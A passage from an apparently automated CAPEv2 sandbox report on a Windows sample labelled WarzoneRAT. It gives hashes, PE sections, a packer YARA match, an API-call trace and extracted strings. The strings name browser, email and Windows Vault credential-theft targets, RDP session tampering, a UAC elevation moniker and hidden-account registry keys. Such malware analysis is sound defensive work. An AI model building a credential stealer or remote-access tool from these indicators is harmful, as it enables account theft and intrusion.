"0x42000040", "entropy": "6.33" }, { "name": ".bss", "raw_address": "0x00015400", "virtual_address": "0x00018000", "virtual_size": "0x00001000", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "2.64" } ], "overlay": null, "resources": [ { "name": "WM_DSP", "offset": "0x00014070", "size": "0x00002c00", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ARABIC_QATAR", "entropy": "4.08" } ], "versioninfo": [], "imphash": "97894ad73734f29b380f736aa922a592", "timestamp": "2018-10-30 03:27:25", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null, "imported_dll_count": 12 }, "data": null, "strings": [ "KERNEL32.dll", "\\Google\\Chrome\\User Data\\Default\\Login Data", "StartServiceW", "5 5$5(5,5054585<5@5D5H5L5P5T5X5\\5`5d5h5l5p5", "GetPrivateProfileStringW", "QSVWh", "1 1-1", "DeleteFileW", "msvcr120.dll", "ShellExecuteA", "User32.dll", "WM_DSP", "FriendlyName", "9!9+929w9", "CreateMutexA", "TerminateProcess", "2,2D2O2`2|2", "PSSSSSSh ", "wsprintfW", "f93tuS", "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "EnumServicesStatusExW", "sqlite3_step", "SessionEnv", " ", "<><&=Y=^>", "lstrlenA", "9\\$4t8", "9 90969;9B9P9U9a9", "9{4vt", "GetCurrentThreadId", "WM_DISP", "6U7n7", ".text", "9,929[9b9p9", "SYSTEM\\CurrentControlSet\\ControlTerminal Server\\AddIns\\Clip Redirector", "RegCreateKeyExW", "rdpWrapIni", "SVWh(", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core", "sqlite3_close", "X0`0d0,181", "svchost.exe -k", "GetTokenInformation", "SMTP Server", "3 3;3H3[3", "sqlite3_prepare_v2", ".CRT$XCA", "PSVWj", "pvids", "sqlite3_open", "0F0Z0", "D$X9w", "PK11_FreeSlot", "MultiByteToWideChar", "5]5t5", "SetCurrentDirectoryW", "Profile", "AllowMultipleTSSessions", "PK11_CheckUserPassword", "MaxConnectionsPerServer", "WideCharToMultiByte", "StrStrA", "\\Mozilla\\Firefox\\", "VaultEnumerateItems", ":\\:y:", "SVWj@R", "566D6[6z6", "B.bss", "lstrcpyW", "Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "!This program cannot be run in DOS mode.", "Grabber", "8%808E8M8]8", "PVShH", "HeapAlloc", "8g9|9", "D$09~", "5/7r7", "MessageBoxW", "VirtualQuery", "G$;C,u;", "PathFindExtensionW", "kernel32", "4)4E4a4p4", "127.0.0.2", "L$TPV", "QQSVW", "s4Vh ", "D$X9~", "<8=^=", "GetTempPathA", "CoTaskMemFree", "encryptedUsername", "Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", "EnterCriticalSection", "POP3 User", "An assertion condition failed", "SetUnhandledExceptionFilter", "1$1B1g1r1", "?(?9?c?", "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", "PathFindFileNameW", "0 0?0P0W0l0", "FreeSid", "LdrGetProcedureAddress", "GetLogicalDriveStringsW", "ping.exe", "ExpandEnvironmentStringsW", "NSS_Shutdown", "lstrcatW", "AVE_MARIA", "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "<)z>R?", "GetBinaryTypeW", "CreateFileA", "SetEvent", "RegDeleteValueW", "9N4u#", "CoUninitialize", "0+0D0]0v0", "727E7X7k7", "SYSTEM\\CurrentControlSet\\Services\\TermService", "CoCreateInstance", "7'7-727c7", "41585", "GetMessageA", "Source", "PathFileExistsW", "CloseHandle", "CreateToolhelp32Snapshot", "PK11SDR_Decrypt", ".rdata$zzzdbg", "CRYPT32.dll", "ShellExecuteExA", "@Description", " ", "PjxQQ", "UnhandledExceptionFilter", "LocalFree", "sqlite3_column_blob", "DispatchMessageA", ":*:4:>:H:s:", "tG;HtsB", "D$89w", "msvcp140.dll", "\\pkgmgr.exe", "GetStartupInfoW", "?vOj@_+", "RegQueryInfoKeyW", "Could not decrypt", ".rsrc$01", "", "3<4N4r4", "RegSetValueExA", "0 0$0(0t1", "253>3j3u3", "GlobalAlloc", "GetCommandLineA", "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ";=;J;", "2(212<2C2c2i2o2u2{2", "CreateProcessW", "4N5\\5", "DefWindowProcA", "RtlGetVersion", "6-6A6]6g6", "sqlite3_close_v2", "GetTempPathW", "u*hh;@", "@SOFTWARE\\_rptls", "sqlite3_column_text", "LookupPrivilegeValueW", "PK11_GetInternalKeySlot", "2!2A28;V;t;", "D$0PV", "SELECT * FROM logins", "383n3", ";:;^;d;", "GetWindowTextW", "AllocateAndInitializeSid", "rdpWrap64", "?!?1?7?=?C?N?T?_?e?p?v?", "CreateFileW", "4.5D5", "6'7?7h7", "sqlite3_finalize", "IsWow64Process", "", "Process32NextW", "PVVVVV", "3\"434<6C6J6R6W6^6q6v6", "CreatePipe", ".rsrc", "CopyFileW", "4?5Q5g5", "@\\cmd.exe", "MachineGuid", "OpenServiceW", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", ">\">)>l>", "GetStartupInfoA", "*010L0", "sqlite3DEvent", "PWWWWQ", ";);\\;m;", "\\Microsoft DN1", "RegisterRawInputDevices", "7(7.74797?7I7U7b7i7n7z7", "Richu", ".CRT$XCZ", "=.=8===D=U=]=d=k=r=y=", "LoadLibraryW", "0>1W1", "@send.db", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...", "Assert", "InitializeCriticalSection", "RegCloseKey", "323N3[3g3~3", "ServiceDll", "?E?r?", "SHGetSpecialFolderPathW", "Internet Explorer", "%ProgramFiles%", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns\\Dynamic VC", "POP3 Server", "firefox.exe", "\\sqlmap.dll", "3.373F3", "8 8:8Q8+9p9", "WaitForSingleObject", "lstrcmpW", "ShellExecuteW", "SizeofResource", "VaultGetItem", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", ";n9>`>", "thunderbird.exe", "dismcore.dll", ".idata$5", "9NPu#", "NSSBase64_DecodeBuffer", "getaddrinfo", "00070D0K0/151<1C1J1U1d1s1", "ntdll.dll", "lstrcmpA", "=$=B=`=", "SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", "9Nlu#", "encryptedPassword", "DeleteCriticalSection", "0)1z1", "GetSystemDirectoryW", "7 808:8A8J8b8", ";_,s6VPS", "find.db", "MaxConnectionsPer1_0Server", "TerminateThread", "LockResource", "6'6@6M6", "T7X7\\7t7x7|7h:l:", ":2:s;", "f99t,+", "RtlInitUnicodeString", "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", " ", "VWQQ3", "RegQueryValueExW", "Unknow", "2 2%2*2/242?2R2`2s2", "RtlFillMemory", "SSShh", ":@;D;X;\\;`;d;", "MapVirtualKeyA", "8!8*8", "OLEAUT32.dll", "ShellExecuteExW", "7%7+757t7z7", "VaultOpenVault", " ", "0\"040N0m0", "HeapReAlloc", "PSVW3", "vaultcli.dll", "VaultFree", "find.exe", "=O>s>", "sqlite3_open_v2", "CloseServiceHandle", "2.2=2Z2w2X3t3", "GetCurrentDirectoryW", "GetWindowsDirectoryW", "41464;4@4G4N4R4X4v4", "GetTickCount", "8&939", ";O0wY", "ReadFile", "RegOpenKeyExW", "%u.%u.%u.%u", "LoadResource", "Hey I'm Admin", "CreateEventA", "freebl3.dll", "4O4{4", "585Q5j5", "TVjD3", "lstrlenW", "< <$<", "SeDebugPrivilege", "ServicesActive", "(SVW3", "RegEnumKeyExW", "5!5t7", "9J;e;", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns", "CertPropSvc", "PeekNamedPipe", "wsprintfA", "?'?3?x?", "GetProcAddress", "WS2_32.dll", "\\firefox.exe", "QQSVWQ", "ImagePath", ".rdata", "GetForegroundWindow", "LdrLoadDll", " ", "C:\\Users\\louis\\Documents\\workspace\\MortyCrypter\\MsgBox.exe", "CryptStringToBinaryA", "Install", "OpenProcessToken", ".00cfg", "sqlite3_column_bytes", "Wow64RevertWow64FsRedirection", "hostname", "u j8Y", "CreateWindowExW", "Account Name", "Sleep", "NtAllocateVirtualMemory", "566i6", "%ProgramW6432%", "PK11_Authenticate", "93tfVVVV", "TranslateMessage", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "FreeLibrary", "LoadLibraryExW", "TSVjD3", "WriteFile", "SHCreateItemFromParsingName", ",SVW3", "ADVAPI32.dll", "SHLWAPI.dll", "SHELL32.dll", "2&2:2U2", "@.data", "LookupAccountSidW", "3%474c4", "rdpWrap32", "GetComputerNameW", "sqlite3_column_type", "RtlLeaveCriticalSection", "=m=t=", "0(080A0H0", ".text$yd", "PWVWWWSh", "W8YYP", "D$0WP", ".text$mn", ".data", "start", "GetDriveTypeW", "/Rich3", "6#7R7{7", ":3<]<", "1#12181G1b1l1w1}1", "SetFilePointer", "freeaddrinfo", "ExplorerIdentifier", "IsProcessorFeaturePresent", "GetFileSize", "QQPQQ", "Email", "GetProcessHeap", "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\", "msvcr", "95:::H:n:{:", "w(9s t", "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", " ", "9\\$|uO", "ole32.dll", "DuplicateHandle", "RegSetValueExW", ".CRT$XCU", "URLDownloadToFileW", "SHCreateDirectoryExW", "USER32.DLL", "LeaveCriticalSection", "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}", "OpenSCManagerW", ";C(vR", "CryptUnprotectData", "0=0h0", "SMTP Password", ";f;v;", "SSSSSS", "Y9F(t", "VaultCloseVault", "RDPClip", "LdrEnumerateLoadedModules", "VWh@\"@", "RtlCreateUnicodeStringFromAsciiz", ".idata$2", "PPVh7", ";\"<3.>9>?>N>T>^>d>h>", "GetLastError", "?lst@@YAXHJ@Z", "2=3t3", "EnableConcurrentSessions", "fDenyTSConnections", "<\"u(A", "TermService", "^AzzIOM", "NETAPI32.dll", "SetLastError", "9\\$ u", "QueryServiceConfigW", "RtlGetCurrentPeb", "SVWPh", "9o:v:", "WM_FIND", "`.rdata", "vncEvent", ".idata$4", "ChangeServiceConfigW", "Process32FirstW", "ExitProcess", "SOFTWARE\\_rptls", "NetLocalGroupAddMembers", "CoInitialize", "nss3.dll", "urlmon.dll", "@.reloc", "RegCreateKeyExA", "-w %ws -d C -f %s", "1)1E1U1[1n1", "svchost.exe", "GetModuleFileNameExW", "RegDeleteKeyW", "373D3Q3^3k3x3", "2&232E2W2g2", "6 7M7c7r7", "SOFTWARE\\Microsoft\\Cryptography", "GetRawInputData", "lstrcatA", "", "OpenProcess", ">5?O?~?", "50[031`1!2N2*3W3o4" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 0, "cape_type": "WarzoneRAT Payload: 32-bit executable", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492 }, { "name": "780ab21799eefba66a2c5561d8644aee7298186886eb79765f3c9e4589e17440", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/780ab21799eefba66a2c5561d8644aee7298186886eb79765f3c9e4589e17440", "guest_paths": "4;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?7456;?", "size": 904, "crc32": "A14E373F", "md5": "6af28a231a5e6dd486177dbc4cb9446d", "sha1": "e0e2982640a8eb7e9f227444563aa7921f06e1ae", "sha256": "780ab21799eefba66a2c5561d8644aee7298186886eb79765f3c9e4589e17440", "sha512": "127bfca442fa10b7150756c4235df433715cbc5e8f98a3670919cca67a45092caab6f632da4afb572102fb90e8239b928062c1b858a9fbe6228e6640f5dfd4b0", "rh_hash": null, "ssdeep": "6:Mxx93kVJ8lR/QxY4IdD6l6/+sdl+lS/tq/e//2t/oDMIbEQXfKvPGWl/wq:SkVWR/QxY486U3dUSlqWaGPKGiIq", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [ { "name": "INDICATOR_EXE_Packed_ASPack", "meta": { "description": "Detects executables packed with ASPack", "author": "ditekSHen" }, "strings": [ "{ 00 00 C0 2E 61 73 70 61 63 6B 00 00 }" ], "addresses": { "s1": 669 } } ], "cape_yara": [], "clamav": [], "tlsh": "T1451192F7A7ADCCF2ED6C00B6544A0747B67A757042A2C203AE89B2253637A087D60F55", "sha3_384": "64c62a1f3bdf29239bb984be898c4761ae8f7c780914f339f8da90d26bc29596a77aa19cd55450ef362d5a16343df838", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x000e7001", "ep_bytes": "", "peid_signatures": null, "reported_checksum": "0x0013a3eb", "actual_checksum": "0x000076ac", "osversion": "4.0", "pdbpath": null, "imports": {}, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x000e8008", "size": "0x00000028" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x000a5000", "size": "0x00041d04" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x000e7fb0", "size": "0x00000008" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x000e7f98", "size": "0x00000018" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00100000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x0008e000", "size_of_data": "0x00039c00", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "0.00" }, { "name": ".itext", "raw_address": "0x0003a000", "virtual_address": "0x0008f000", "virtual_size": "0x00001000", "size_of_data": "0x00000600", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "0.00" }, { "name": ".data", "raw_address": "0x0003a600", "virtual_address": "0x00090000", "virtual_size": "0x00003000", "size_of_data": "0x00001200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".bss", "raw_address": "0x0003b800", "virtual_address": "0x00093000", "virtual_size": "0x00004000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".idata", "raw_address": "0x0003b800", "virtual_address": "0x00097000", "virtual_size": "0x00003000", "size_of_data": "0x00000e00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".tls", "raw_address": "0x0003c600", "virtual_address": "0x0009a000", "virtual_size": "0x00001000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".rdata", "raw_address": "0x0003c600", "virtual_address": "0x0009b000", "virtual_size": "0x00001000", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".reloc", "raw_address": "0x0003c800", "virtual_address": "0x0009c000", "virtual_size": "0x00009000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc2000040", "entropy": "0.00" }, { "name": ".rsrc", "raw_address": "0x0003c800", "virtual_address": "0x000a5000", "virtual_size": "0x00042000", "size_of_data": "0x00006400", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".aspack", "raw_address": "0x00042c00", "virtual_address": "0x000e7000", "virtual_size": "0x0002c000", "size_of_data": "0x0002bc00", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "0.00" }, { "name": ".adata", "raw_address": "0x0006e800", "virtual_address": "0x00113000", "virtual_size": "0x00001000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000040", "entropy": "0.00" } ], "overlay": { "offset": "0x00000138", "size": "0x00000250" }, "resources": [], "versioninfo": [], "imphash": "", "timestamp": "1992-06-19 23:22:17", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null }, "data": null, "strings": [ ".text", ".rsrc", ".idata", ".itext", ".aspack", ".adata", ".reloc", ".rdata", ".data" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "selfextract": { "overlay": { "extracted_files": [ { "name": "0c132589dad4aae89a6ac19b17cded61e9ac8d8fc812ccb680233784faa908df", "path": "/opt/CAPEv2/storage/analyses/1889/selfextracted/0c132589dad4aae89a6ac19b17cded61e9ac8d8fc812ccb680233784faa908df", "guest_paths": [ "overlay" ], "size": 592, "crc32": "8F59E61D", "md5": "18ea8ca63c909ab345ebbaa3d7e228d7", "sha1": "32454ffe2bba7ba4dc624d8f17eb90b7f4c1d3e9", "sha256": "0c132589dad4aae89a6ac19b17cded61e9ac8d8fc812ccb680233784faa908df", "sha512": "23fc8f438c740d28dc94f322ad4884761b9acbbf6de8b3258b1a14951007035d1f5572af125e56fbe626802f9ba5a2f282ef2c1c3942f0a99f3b8e4526c82b5b", "rh_hash": null, "ssdeep": "6:i6l6/+sdl+lS/tq/e//2t/oDMIbEQXfKvPGWl/wq:i6U3dUSlqWaGPKGiIq", "type": "data", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T1E1F05EFB73E9CCB2EC2C007B944E134BB47E353086A2C207AE88A2165777A487D61B01", "sha3_384": "48cc023e00d4372976effdee8d855e708e8acd320f210ab3bd8bc620c859ac172f1cf487b811fa22e19eb52c3314cdef", "data": null } ], "extracted_files_time": 0.000695105001796037, "password": "" } }, "cape_type_code": 4, "cape_type": "Injected Shellcode/Data: 32-bit executable", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492, "target_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "target_process": "f1e62c0e7345fc825586.exe", "target_pid": "7456" } ], "configs": [] }, "info": { "version": "2.4-CAPE", "started": "2025-03-02 22:32:02", "ended": "2025-03-02 22:33:38", "duration": 96, "id": 1889, "category": "file", "custom": "", "machine": { "id": 1889, "status": "stopping", "name": "custom", "label": "win10", "platform": "windows", "manager": "KVM", "started_on": "2025-03-02 22:32:02", "shutdown_on": "2025-03-02 22:33:37" }, "package": "exe", "timeout": false, "shrike_url": null, "shrike_refer": null, "shrike_msg": null, "shrike_sid": null, "parent_id": null, "tlp": null, "parent_sample": {}, "options": {}, "source_url": null, "route": "false", "user_id": 0, "CAPE_current_commit": "f89c890143b59bdbcc9b9c8b5e15fbc5fd827afd" }, "behavior": { "processes": [ { "process_id": 4492, "process_name": "f1e62c0e7345fc825586.exe", "parent_id": 4168, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "first_seen": "2025-03-02 21:32:27,737", "calls": [ { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e1c36", "parentcaller": "0x764dd966", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "MSVCRT.DLL" }, { "name": "BaseAddress", "value": "0x753c0000" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e0071", "parentcaller": "0x73234011", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e0071", "parentcaller": "0x7323401d", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x80\\x00\\x00" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771b0cb3", "parentcaller": "0x764fcbb7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x048a0000" }, { "name": "RegionSize", "value": "0x00080000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771b0ced", "parentcaller": "0x764fcbb7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x048a0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e1c36", "parentcaller": "0x764e0372", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32" }, { "name": "BaseAddress", "value": "0x76610000" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e1c36", "parentcaller": "0x764e0372", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\bcryptPrimitives" }, { "name": "DllBase", "value": "0x76370000" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e1c36", "parentcaller": "0x764e0372", "category": "misc", "api": "GetCursorPos", "status": true, "return": "0x00000001", "arguments": [ { "name": "x", "value": "838" }, { "name": "y", "value": "740" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e0071", "parentcaller": "0x73234142", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x764e0071", "parentcaller": "0x7323414e", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "12" }, { "name": "ProcessInformation", "value": "\\x00\\x80\\x00\\x00" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x75872ec5", "parentcaller": "0x7323509d", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x020c0bb0", "arguments": [ { "name": "Module", "value": "0x73210000" }, { "name": "Type", "value": "#6" }, { "name": "Name", "value": "#3585" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\MFC42LOC.DLL" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771957c9", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\MFC42LOC.DLL.DLL" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\MFC42LOC.DLL" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771957c9", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\sysnative\\MFC42LOC.DLL.DLL" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771957c9", "parentcaller": "0x764e1f4e", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\mfc42" }, { "name": "BaseAddress", "value": "0x73210000" }, { "name": "InitRoutine", "value": "0x73245e40" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 16 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x004057aa", "parentcaller": "0x0040b1d9", "category": "misc", "api": "GetCursorPos", "status": true, "return": "0x00000001", "arguments": [ { "name": "x", "value": "1023" }, { "name": "y", "value": "705" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-03-02 21:32:27,894", "thread_id": "4148", "caller": "0x0040b2b7", "parentcaller": "0x00000000", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", 